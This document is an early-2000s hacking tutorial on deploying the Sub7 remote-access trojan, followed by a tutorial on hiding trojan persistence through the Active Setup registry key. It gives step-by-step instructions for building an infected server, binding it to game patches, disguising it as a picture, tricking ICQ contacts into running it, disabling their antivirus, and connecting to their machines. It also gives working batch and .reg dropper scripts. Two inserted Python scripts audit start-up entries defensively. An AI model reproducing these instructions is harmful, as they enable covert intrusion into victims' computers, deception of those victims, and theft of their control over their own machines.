BE A GOOD HACKER
HOW TO HACK
Volume 1 The Complete Guide To Sub7 By Switch Blade
The Information In This Document:
-Where to get sub7
-Using Editserver.exe
-How to Give Sub7 to your victim
-How to disable the Virus Scanner
-How To Connect
-Start Up Methods
-What to do
Terms
This document is of free distribution under ANY means, As long as the information remains INTACT.
Terms of use:
This is provided “as is”. This document has been created with educational intention ONLY. The consequences that the bad use of this information could bring are the executor's responsibility ONLY. By reading this document, you agree with these terms; if you do not, then DELETE this copy of the document RIGHT NOW. Switch Blade does not accept any responsibility for any circumstances that occur after you read this document, it's all your responsibility!
Where To Get Sub7:
I know this is long, but it has all the info you need to use Sub7!
Ok firstly Sub7 is a must for all people who like to play around on the Internet, If you want Sub7 there are many sites you can get it from:
-http://subseven.slak.org [under construction at the time this was written!]
-http://tectop100.hypermart.net/substuff/
-http://www.geocities.com/sub_skin7 [under construction at time this was written, will be finished soon!!]
Ok now you've found a site with Sub7 on, which version do you get??
The Best version so far is still 2.1/2.1a/2.1b or 2.1gold [until 2.3 comes out] so for now we'll say get version 2.1b!
**NOTE**
If you have Anti-Virus software running it will detect "Sub7.exe" and "Editserver.exe" as viruses, but don't worry, they aren't; the only virus is the "Server.exe", which is what you give to your victim!
Using Editserver And The Functions Of The Editserver Options:
Using Editserver.exe
First thing you'll have to do is modify the Server.exe, so go to wherever you have Sub7 and double click on "Editserver.exe" and you'll get a menu for modifying the "Server.exe"!
-So the first thing you'll see is "Start Up Method[s]"; this is how you want the Server to start up on your victim's PC. You can have as many of these options selected as you like, so if you want to be really nasty click them all so it's really hard to get rid of the "Server", but just selecting "win.ini" will do the job!
-Click Here For Full Information On Each Start-Up Method
-Next you'll see Notifications; this is how you want to be notified that your victim is online. First enter your victim's name: "John". Now ICQ notify is where you get paged on ICQ that your victim is online and what his IP number is, so just enter your ICQ number and select the box. Next is IRC notify [if you don't know what it is click the ?]; just enter your IRC details for that. Last is e-mail notify; you have to have an e-mail address on the selected servers in the menu!
-On the right you'll see "Installation"; this is how the "Server" will set itself up on the victim's PC. First select "Automatically Start Server On Port:" and just type in a random number but keep it around the same as the default [keep the number safe]. You can select "Use Random Port" but then you have to rely on Notification, which can fail! Next you'll see "Server Password"; this means your Victim will have to enter a password to open the "Server", so just leave it! You can ignore the other box, and for IRC bot settings only do that if you know how to use IRC! Now you can call the server whatever you want when it's installed on the victim's PC. So call it winRUN.exe or WinDLL.exe, something that sounds important to the PC so they don't delete it **But remember to put a .com or .exe**. "Melt Server" means do you want the file you give them to delete once they've installed the virus? I normally select it. Enable fake error message is basic: do you want it to give them an error message when they install it? You can put whatever you want; if so select the box and type in the message you want it to say! Do you want it to bind with an .exe file? If so, bind it with a game patch, so when they install the patch it also installs the virus! Password protect is to protect the server from being opened with someone else's "Editserver.exe".
-Last is at the top: change the icon. Change it to a picture icon, game icon or an icon you have on your hard drive! Save it as pic.exe!
And that's it, now you have the server ready for the victim
The Easiest Way To Give Your Victim Sub7:
How to give your victim Sub7
First try and get a victim on ICQ as you can get their IP address straight away! Now once you have found someone, just chat to them and find out if they have a virus scanner [if so check the below paragraph, if not just jump that paragraph]. Don't jump straight into it; first just give them easy questions like "A/S/L, how are you, Do you have a pic", then ask them about the Virus Scanner. If they ask why, just say it's because of all the worms and viruses on the net, and you're just wondering what they are using as you might get some! Now once you know that, you are ready to give them the trap!
How to disable the Virus Scanner
There are two ways:
1] This is the easy way: you find out what virus scanner they use, then find the appropriate "DAT Killer.exe". You can say it's a pic, or even a patch you know about for the virus scanner they have! Once they have clicked on it then the Virus Scanner is F***ed! Now just say you have [another] pic for them that you hope will work! Of course it's the sub7 server you have created [remember to change the icon to the Paint Shop Pro Pallet icon]. Now once they double click on it "bang!" they are caught!
2] Just give them the server straight away as a pic, once they say it's a Virus. Blag your way around it. Say it must have become corrupt! on the download but it should still work!
How To Connect To The Victims PC:
Ok now you've done the hard part of giving them the Sub7 server saying it's a pic [remember to change the icon to the Paint Shop Pro Pallet icon]! Now go into Sub7 and click on the IP button. On the line that says "ICQUIN" type the victim's ICQ number, then press "resolve UIN" and it will give you their IP number. Go back to the main screen and put the IP in the "IP/UIN box", then in the box next to that put in the port you set the server to [27374 is the default]. Now click connect and you should be in!
Full Information On Start Up Techniques:
Common Registry Entries
Although there are many different ways to configure Sub7 to infect a computer there are also some common registry entries that are added no matter which option you select. These entries are encrypted, and are used to store configuration information for the server, such as passwords, and other configurable information. The following are added to the registry.
The key:
HKEY_LOCAL_MACHINEEnumPCIRZNSSS
There are also 21 values that are added to this registry key, which store information on the server in an encrypted form. There is also a new file association that is added to the registry to allow files with the extension .DL to be executed by windows. The following key is added to the registry.
HKEY_CLASSES_ROOT\.dl
These values are added to the key to make it executable:
HKEY_CLASSES_ROOT\.dl\(Default) = "exefile"
HKEY_CLASSES_ROOT\.dl\Content Type = "application/x-msdownload"
WIN.INI
This is an easy method to detect, the server file adds, or edits an entry to the WIN.INI file to load the server when windows starts up. This was the default method of starting the server in the version that I downloaded.
[windows]
run=MSREXE.EXE
NB There might also be other files that are loaded with this command, like printer drivers; these are supposed to be there. Only the MSREXE.EXE file name is not supposed to be there. Leave the others alone.
Registry Run
So that the trojan can run from the registry, an extra entry is added to the Run key of the registry. The value that is added to the registry is
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinLoader = "MSREXE.EXE"
Registry Run Services
There is also a second method that can be used to run the server from the registry. This time the server is started from the Run Services key, as opposed to the Run key that is used in the first method. The value added to the Run Services key is
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\WinLoader = "MSREXE.EXE"
Less Known Method
This is another method that does not bother to use the registry to hide the server, instead it is stored in the SYSTEM.INI file. The server is added to the same line as windows explorer, to start up at the same time. The line that is modified is in the [boot] section, and is the line
[boot]
shell = explorer.exe MSREXE.EXE
This line may not be directly under [boot] but will be somewhere in that first block of statements.
NB Only the name of the server file MSREXE.EXE (or it might just be MSREXE) is used to start the server file. The explorer.exe (or possibly progman.exe) is a part of windows, and should not be removed, or changed.
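An added example (not part of the original text): a Python check for the WIN.INI and SYSTEM.INI start-up entries described above. Because the server file name is configurable, it lists every program on run= (and load=, a related WIN.INI key the text does not mention) and anything besides the shell on shell=, and marks the MSREXE name given here; the sample INI contents and HPDRV.EXE are constructed.

```python
SHELLS = {"explorer.exe", "progman.exe"}   # shells the text says must stay

def startup_entries(ini_text, section, key):
    """Programs listed on `key=` inside `[section]` of a Win9x INI file."""
    in_section, progs = False, []
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # ';' starts a comment
        if line.startswith("["):
            in_section = line.lower() == f"[{section}]"
        elif in_section and "=" in line:
            name, _, value = line.partition("=")
            if name.strip().lower() == key:
                progs += value.replace(",", " ").split()
    return progs

def audit_ini(win_ini, system_ini):
    """Return (location, program, matches_name_from_text) for each entry to review."""
    found = [(f"win.ini {key}=", prog)
             for key in ("run", "load")
             for prog in startup_entries(win_ini, "windows", key)]
    found += [("system.ini shell=", prog)
              for prog in startup_entries(system_ini, "boot", "shell")
              if prog.lower().rsplit("\\", 1)[-1] not in SHELLS]
    # The text gives MSREXE.EXE (or just MSREXE) as the server file name.
    return [(loc, prog, prog.lower().rsplit("\\", 1)[-1].split(".")[0] == "msrexe")
            for loc, prog in found]

# Constructed sample files; HPDRV.EXE stands in for a legitimate printer helper.
WIN_INI = """[windows]
load=
run=HPDRV.EXE MSREXE.EXE
NullPort=None
"""
SYSTEM_INI = """[boot]
system.drv=system.drv
shell = explorer.exe MSREXE
"""

if __name__ == "__main__":
    for finding in audit_ini(WIN_INI, SYSTEM_INI):
        print(finding)
```

Entries reported with False still need a manual look, since a renamed server file would appear the same way as a legitimate driver helper.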
Not Known Method
For the unknown method there are two files. As well as the MSREXE.EXE file, which is added the same as with all other installation methods, there is a second file, WINDOS.EXE, that is added to the Windows directory. It is this file that is used to start the server, as it is this file that is added to the registry. The value is added here:
HKEY_CLASSES_ROOT\exefile\shell\open\command\(Default) = WINDOS.EXE
What To Do:
Ok First DONT go f*cking up peoples hard drive cos that's just whack Sh!t. Use the real purpose of Sub7 to have fun!! Try all the options and see which works best for you.
Don't go leaving traces of you e.g. Name, E-mail, ICQ or even web page address! Otherwise all should be cool, and have fun!
Shouts And Praise To:
Shouts:
-Yo big shout out to all the people working on the sub7 page with me,
-Shout out to all you reading this
-Shout out to my Digimortal team
-http://www.mp3.com/digimortal
-Shout out to all those who took my Server file on ICQ I love you lot!
-Shout out to all those who tried it on me and failed!
And huge shout to all my mates!!
-Shout out to Boogie Man, Swift Cutthroat, Spinn DD and anyone who uses Sub7
reefa_2001@hotmail.com "no viruses"
If you find any problems with this or you need help then please e-mail me…
There Will Be More Volumes To Come
© Copyright SXB 2001, http://www.geocities.com/sub_skin7/
On Sub7 2.2 and 2.3
© Astalavista.com
HACKING 2
ActiveX startup Method
THIS IS A TUTORIAL ON THE HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components STARTUP METHOD
The ActiveX installed components key can be used to run programs at Windows startup. You would prefer this to other methods like win.ini, system.ini or the run services key to start up programs (I mean trojans and other progs), as it's harder to detect.
Even if your victim is not too knowledgeable on this matter, he just has to use msconfig.exe (in win98) or other software that shows registry entries in the run services key, and your entry (I mean the entry that your trojan file adds) to this key can be removed easily.
I think this method was first used in subseven 2.2; it's my favourite. If for some reason you want to use a trojan server that does not support this method, read on.
Info on this method-
A key has to be created in HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\key (key stands for any key name of your choice; I will use ironmaiden as an example). So I would have to create this path:
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden
The name of the value should be "StubPath" and its data should be the path of your file.
example-
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden]
"StubPath"="c:\rev.exe"
(i will come back to this a little later)
You can try this on your pc with some friendly program ,so that u know what's goin on.
click on start
run
regedit
go to HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
create a new key
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden
add a new string value
rename the name to stubpath and put the value as the path of your program
ex: name - StubPath, value - c:\rev.exe
restart your pc
You'll find your program runs at startup. Now go to HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components; you'll find a new key created with the key name you chose (here ironmaiden). This key is created every time a new key is created in HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components. Now delete this key and restart your PC. You'll find your program running again.
So you will have figured out that your program starts up as long as the entry in HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components
is not present. The trick here is to delete this key every time your program runs, so that it runs on next startup. I think in subseven 2.2, the server renames the key in HKLM each time (correct me if I am wrong here).
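An added example, not from the original tutorial: a Python audit of a REGEDIT4 export covering the registry start-up locations described in this document (Run, RunServices, the exefile open command, the .dl association) and the Active Setup behaviour explained above, where a StubPath under HKLM with no matching HKCU key runs at the next logon. It assumes the export contains both the HKLM and HKCU branches; ExampleComponent and the sample text are constructed, and a legitimately pending component is reported too, so findings are for review.

```python
import re
HKLM, HKCU, HKCR = "hkey_local_machine", "hkey_current_user", "hkey_classes_root"
RUN = HKLM + r"\software\microsoft\windows\currentversion\run"
EXE_CMD = HKCR + r"\exefile\shell\open\command"
ASETUP = HKLM + r"\software\microsoft\active setup\installed components" + "\\"

def parse_reg(text):
    """REGEDIT4 export -> {key: {value name: data}}, names lower-cased, '@' = (Default)."""
    keys, cur = {}, None
    for line in map(str.strip, text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            cur = keys.setdefault(line[1:-1].lower(), {})
        elif cur is not None and "=" in line:
            name, _, data = line.partition("=")
            if len(data) > 1 and data[0] == data[-1] == '"':
                data = re.sub(r"\\(.)", r"\1", data[1:-1])   # undo \\ and \" escapes
            cur[name.strip('"').lower()] = data
    return keys

def audit_reg(text):
    """Return (check, key, data) for each start-up location worth reviewing."""
    reg, out = parse_reg(text), []
    for key in (RUN, RUN + "services"):
        out += [("autorun", key, data) for data in reg.get(key, {}).values()]
    cmd = reg.get(EXE_CMD, {}).get("@")
    if cmd is not None and cmd.strip() != '"%1" %*':      # the Windows default
        out.append(("exefile-hijack", EXE_CMD, cmd))
    for key, vals in reg.items():
        ext = key[len(HKCR) + 1:]
        if (key.startswith(HKCR + "\\.") and "\\" not in ext and ext != ".exe"
                and vals.get("@", "").lower() == "exefile"):
            out.append(("extension-runs-as-exe", key, ext))
        # A StubPath in HKLM with no matching HKCU key runs at the next logon.
        if key.startswith(ASETUP) and "stubpath" in vals \
                and HKCU + key[len(HKLM):] not in reg:
            out.append(("active-setup-pending", key, vals["stubpath"]))
    return out

SAMPLE = r'''REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"WinLoader"="MSREXE.EXE"
[HKEY_CLASSES_ROOT\.dl]
@="exefile"
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="WINDOS.EXE"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden]
"StubPath"="c:\\windows\\system\\directx\\dxsetup.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ExampleComponent]
"StubPath"="example.exe /install"
[HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\ExampleComponent]
'''  # constructed sample export
```

A component that stays in the active-setup-pending list across several logons is the pattern the text describes, because a normal component gets its HKCU key after its first run.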
Now here's what u need-
1)a file binder(sennaspy one exe maker(kicks ass,has a lot of options like copy to some dir,can hide execution) http://www.megasecurity.org/Binders/Files/Ssoem2.0a.zip)
2)a command line registry manipulation tool(dtreg.exe is what i use, download it from http://www.tamedos.com/downloads)
3)your trojan file
1st step
choose a directory where you want your file to run from.i will suggest c:\windows\system\directx as an example(u should change it to something else).This is just to make the file harder to detect.
2nd step
use a binder like sennaspy or juntador to bind your server file to a bat file.
to create the bat file
open notepad
copy the following lines
//
cd system
cd directx
dtreg -deletekey "\hkcu\software\microsoft\active setup\installed components\ironmaiden"
//(without //)
save the file as something.bat
bind your file with something.bat file(in the same order,so that ur file is executed before something.bat).supress the output screen of something.bat by using the hide mode in sennaspy one exe maker.
this is your modified server that will startup each time.reName it as dxsetup.exe or something.
3rd step
open notepad
copy these lines
//
REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ironmaiden]
"StubPath"="c:\\windows\\system\\directx\\dxsetup.exe"
//(don't include //)
save it as dd.reg
create this bat file
//
cd temp
copy dxsetup.exe c:\windows\system\directx
copy dtreg.exe c:\windows\system\directx
regedit /s dd.reg
deltree /y *.*
//
save it as a bat file
now use your binder to bind the trojan file u created in step 2,dtreg.exe,the reg file dd.reg and the bat file u created above(in order given).set the files extract to c:\windows\temp.disable running of these programs.u just have to copy then to c:\windows\temp.the bound file is the file u got to infect people with.
I am sure there are other ways of doing this. Please inform me if you know some better way.
This is my first tutorial. Send me your suggestions at headputty@ziplip.com
- the ip[s] of the server
- the server port
- the server password. blank if none
- name of the victim.
- computer username. useful if you want more info in the notification.
- if the notifications are protected, this is the password.
- the version of the server.
- the \windows\system\ folder of the server. used mainly for files.
- the \windows\ folder of the server. used mainly for files.
- the connection type [lan/modem/proxy].